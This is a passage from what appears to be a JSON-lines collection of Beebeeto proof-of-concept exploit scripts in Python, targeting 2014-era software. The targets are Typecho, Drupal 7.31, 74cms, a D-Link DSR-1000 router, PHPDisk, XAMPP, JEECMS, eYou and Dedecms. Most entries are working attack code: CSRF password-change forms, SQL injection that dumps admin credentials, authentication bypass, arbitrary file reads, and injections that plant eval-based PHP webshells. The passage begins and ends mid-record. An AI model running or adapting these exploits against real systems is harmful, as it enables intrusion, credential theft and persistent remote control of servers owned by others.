'CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e', '/profile.php'],\r\n            'desc': '''\r\n                    http://typecho/admin/profile.php page, Change password form CSRF vul.\r\n                    http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.\r\n                    ''',\r\n            'references': ['http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        verify_url = args['options']['target'] + '/index.php/action/users-profile'\r\n        if args['options']['verbose']:\r\n            print '[*] Generation: ' + verify_url\r\n        temp = '''\r\n        <div style=\"display: none;\">\r\n        <form action=\"%s\" method=\"post\" name=\"ff0000team\" enctype=\"application/x-www-form-urlencoded\">\r\n        <input type=\"hidden\" name=\"password\" value=\"beebeeto\"/>\r\n        <input type=\"hidden\" name=\"confirm\" value=\"beebeeto\" />\r\n        <input name=\"do\" type=\"hidden\" value=\"password\" />\r\n        <button type=\"submit\"></button>\r\n        </form>\r\n        </div>\r\n        <script>\r\n        setTimeout(\"document.ff0000team.submit()\", 2000);\r\n        </script>\r\n        ''' % verify_url\r\n        print '[*] Copy code: ' + temp\r\n        print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = 'Generation ok'\r\n        return args\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://typecho/admin/profile.php page, Change password form CSRF vul.\r\nhttp://typecho/admin/themes.php, We can write the PHP Backdoor in this page.", "app_name": "Typecho", "id": "poc-2014-0102", "layer4_protocol": null}
+{"create_date": "2014-10-21 21:39:38", "name": "Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Ricter", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Drupal\u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,PHP,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0100',\r\n            'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit',\r\n            'author': 'Ricter',\r\n            'create_date': '2014-10-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Drupal',\r\n            'vul_version': ['<=7.31'],\r\n            'type': 'Code Execution',\r\n            'tag': ['Drupal\u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'PHP', 'GETSHELL'],\r\n            'desc': '''\r\n                    Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\r\n                    \u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n                    ''',\r\n            'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'\r\n        payload = \"name[0;insert into menu_router (path,  page_callback, access_callback, \" \\\r\n                  \"include_file, load_functions, to_arg_functions, description) values ('<\" \\\r\n                  \"?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '\" \\\r\n                  \"modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo\" \\\r\n                  \"rm_id=user_login_block\"\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + url\r\n            print '[*] POST Content: ' + payload\r\n\r\n        urllib2.urlopen(url, data=payload)\r\n        request = urllib2.Request(webshell_url, data=\"e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);\")\r\n        response = urllib2.urlopen(request).read()\r\n\r\n        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = url\r\n            args['poc_ret']['Webshell'] = webshell_url\r\n            args['poc_ret']['Webshell_PWD'] = 'e'\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    verify = exploit\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6", "app_name": "Drupal", "id": "poc-2014-0100", "layer4_protocol": null}
+{"create_date": "2014-10-21 16:40:27", "name": "xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "xampp\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/xampp/showcode.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0098',\r\n            'name': 'xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-10-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'xampp',\r\n            'vul_version': ['1.7.3'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['xampp\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/xampp/showcode.php', 'php'],\r\n            'desc': 'xampp <=1.7.3 has a file disclosure Vul. attacker can read any files on web server.',\r\n            'references': ['http://www.exploit-db.com/exploits/15370/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/xampp/showcode.php/c:boot.ini?showcode=1'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"<textarea cols='100' rows='10'>[boot loader]\" in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "xampp <=1.7.3 has a file disclosure Vul. attacker can read any files on web server.", "app_name": "XAMPP", "id": "poc-2014-0098", "layer4_protocol": null}
+{"create_date": "2014-10-21 16:34:25", "name": "eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/listCollege.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0097',\r\n            'name': 'eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-10-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'eYou',\r\n            'vul_version': ['v3'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['eYou\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/listCollege.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://sebug.net/vuldb/ssvid-62693',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/user/send_queue/listCollege.php'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n        match = res.findall(content)\r\n        if match:\r\n            if '<b>Warning</b>:' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "eYou", "id": "poc-2014-0097", "layer4_protocol": null}
+{"create_date": "2014-10-21 15:59:29", "name": "74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "74cms\u6f0f\u6d1e,SQL\u6ce8\u5165,/plus/ajax_officebuilding.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0093',\r\n            'name': '74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',\r\n            'create_date': '2014-10-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '74cms',\r\n            'vul_version': ['V3.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['74cms\u6f0f\u6d1e', 'SQL\u6ce8\u5165', '/plus/ajax_officebuilding.php', 'php'],\r\n            'desc': '74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-063225',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/plus/ajax_officebuilding.php?act=key&key=asd%\u9326%27%20uniounionn%20selselectect\"\r\n                   \"%201,2,3,md5(7836457),5,6,7,8,9%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        if '3438d5e3ead84b2effc5ec33ed1239f5' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        vul_url = args['options']['target'] + \"/plus/ajax_officebuilding.php\"\r\n        paload1 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,admin_name,5,6,7,pwd,9%20from\"\r\n                   \"%20qs_admin%20LIMIT%201%23\")\r\n        paload2 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,pwd_hash,5,6,7,8,9%20from%20\"\r\n                   \"qs_admin%20LIMIT%201%23\")\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + vul_url\r\n        request = urllib2.Request(vul_url + paload1)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        pattern = re.compile(r'.*?<a[^>]*?>(?P<username>[^<>]*?)</a><span>(?P<password>[^<>]*?)</span>',re.I|re.S)\r\n        match = pattern.match(content)\r\n        if match == None:\r\n            args['success'] = False\r\n            return args\r\n        else:\r\n            username = match.group('username').strip()\r\n            password = match.group('password').strip()\r\n            request = urllib2.Request(vul_url + paload2)\r\n            response = urllib2.urlopen(request)\r\n            content = response.read()\r\n            pattern = re.compile(r'.*?<a[^>]*?>(?P<pwdhash>[^<>]*?)</a>',re.I|re.S)\r\n            match = pattern.match(content)\r\n            if match == None:\r\n                args['success'] = False\r\n                return args\r\n            else:\r\n                passwordhash = match.group('pwdhash').strip()\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = vul_url\r\n                args['poc_ret']['Username'] = username\r\n                args['poc_ret']['Password'] = password\r\n                args['poc_ret']['PasswordHash'] = passwordhash\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "74cms", "id": "poc-2014-0093", "layer4_protocol": null}
+{"create_date": "2014-10-21 11:16:58", "name": "D-Link DSR-1000 v1.08B77 Authentication Bypass POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "e3rp4y", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "D-Link\u6f0f\u6d1e,Authentication Bypass,SQL Injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import forgeheaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0090',\r\n            'name': 'D-Link DSR-1000 v1.08B77 Authentication Bypass POC',\r\n            'author': 'e3rp4y',\r\n            'create_date': '2014-10-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'D-Link',\r\n            'vul_version': ['< Firmware v1.08B77'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['D-Link\u6f0f\u6d1e', 'Authentication Bypass', 'SQL Injection'],\r\n            'desc': 'D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907',\r\n            'references': ['http://www.exploit-db.com/papers/30061/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        ua = forgeheaders.Linux().randomly_get()\r\n        headers = {\r\n            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n            'Content-Type': 'application/x-www-form-urlencoded',\r\n            'Origin': args['options']['target'],\r\n            'Referer': args['options']['target'] + '/',\r\n            'User-Agent': ua}\r\n\r\n        url = args['options']['target'] + 'platform.cgi'\r\n        resp = requests.post(\r\n            url,\r\n            headers=headers,\r\n            data={'thispage': 'index.htm',\r\n                  'Users.UserName': 'admin',\r\n                  'Users.Password': \"' or 'a'='a\",\r\n                  'button.login.Users.deviceStatus': 'Login',\r\n                  'Login.userAgent': ua})\r\n\r\n        if resp.status_code != 200:\r\n            args['success'] = False\r\n            return args\r\n\r\n        if 'title=\"Continue\"' not in resp.text and \\\r\n           'Logout' not in resp.text:\r\n            args['success'] = False\r\n            return args\r\n\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907", "app_name": "D-LINK", "id": "poc-2014-0090", "layer4_protocol": null}
+{"create_date": "2014-10-21 10:52:24", "name": "JEECMS /download.jspx Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "flsf", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JEECMS\u6f0f\u6d1e,/download.jspx,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0088',\r\n            'name': 'JEECMS /download.jspx Arbitrary File Download POC',\r\n            'author': 'flsf',\r\n            'create_date': '2014-10-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'JEECMS',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['JEECMS\u6f0f\u6d1e', '/download.jspx', 'Arbitrary File Download'],\r\n            'desc': '/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-077960',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        if 'WEB-INF/config/' in content and 'contextConfigLocation' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6", "app_name": "JEECMS", "id": "poc-2014-0088", "layer4_protocol": null}
+{"create_date": "2014-10-20 17:49:50", "name": "PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "PHPDisk E_Core \u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/phpdisk_del_process.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0087',\r\n            'name': 'PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2014-10-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPDisk',\r\n            'vul_version': ['2.5'],\r\n            'type': 'Code Execution',\r\n            'tag': ['PHPDisk E_Core \u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/phpdisk_del_process.php'],\r\n            'desc': '\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-057665',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n        shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n        data = {\r\n            'pp': 'system/install.lock',\r\n            'file_id': '<?php echo md5(233333);?>#',\r\n            'safe': 'a'\r\n        }\r\n        post_data = urllib.urlencode(data)\r\n        request = urllib2.Request(del_url, post_data)\r\n        response = urllib2.urlopen(request)\r\n        shell_request = urllib2.Request(shell_url)\r\n        shell_response = urllib2.urlopen(shell_request)\r\n        content = shell_response.read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + del_url\r\n            print '[*] Request URL2: ' + shell_url\r\n        match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n        if match:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = shell_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n        shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n        data = {\r\n            'pp': 'system/install.lock',\r\n            'file_id': '<?php echo md5(233333);eval($_POST[bb2];?>#',\r\n            'safe': 'a'\r\n        }\r\n        post_data = urllib.urlencode(data)\r\n        request = urllib2.Request(del_url, post_data)\r\n        response = urllib2.urlopen(request)\r\n        shell_request = urllib2.Request(shell_url)\r\n        shell_response = urllib2.urlopen(shell_request)\r\n        content = shell_response.read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + del_url\r\n            print '[*] Request URL2: ' + shell_url\r\n        match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n        if match:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = shell_url\r\n            args['poc_ret']['content'] = '<?php echo md5(233333);eval($_POST[bb2];?>'\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag", "app_name": "PHPDisk", "id": "poc-2014-0087", "layer4_protocol": null}
+{"create_date": "2014-10-19 16:26:45", "name": "Dedecms v5.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Dedecms\u4fe1\u606f\u6cc4\u9732,Dedecms\u7206\u8def\u5f84,5.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0084',\r\n            'name': 'Dedecms v5.5 full Path Disclosure Vulnerability POC',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2014-10-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Dedecms',\r\n            'vul_version': ['5.5'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Dedecms\u4fe1\u606f\u6cc4\u9732', 'Dedecms\u7206\u8def\u5f84', '5.5\u8def\u5f84\u6cc4\u9732'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.myhack58.com/Article/html/3/62/2010/26804.htm',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_list =  ['/plus/paycenter/alipay/return_url.php',\r\n                      '/plus/paycenter/cbpayment/autoreceive.php',\r\n                      '/plus/paycenter/nps/config_pay_nps.php',\r\n                      '/plus/task/dede-maketimehtml.php',\r\n                      '/plus/task/dede-optimize-table.php',]\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in file_list:\r\n            verify_url = args['options']['target'] + filename\r\n            try:\r\n                if args['options']['verbose']:\r\n                    print '[*] Requst URL: ' + verify_url\r\n                req = urllib2.urlopen(verify_url)\r\n                content = req.read()\r\n            except:\r\n                continue\r\n            if '<b>Fatal error</b>:' in content and '.php</b>' in content:\r\n                if 'on line <b>'  in content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = 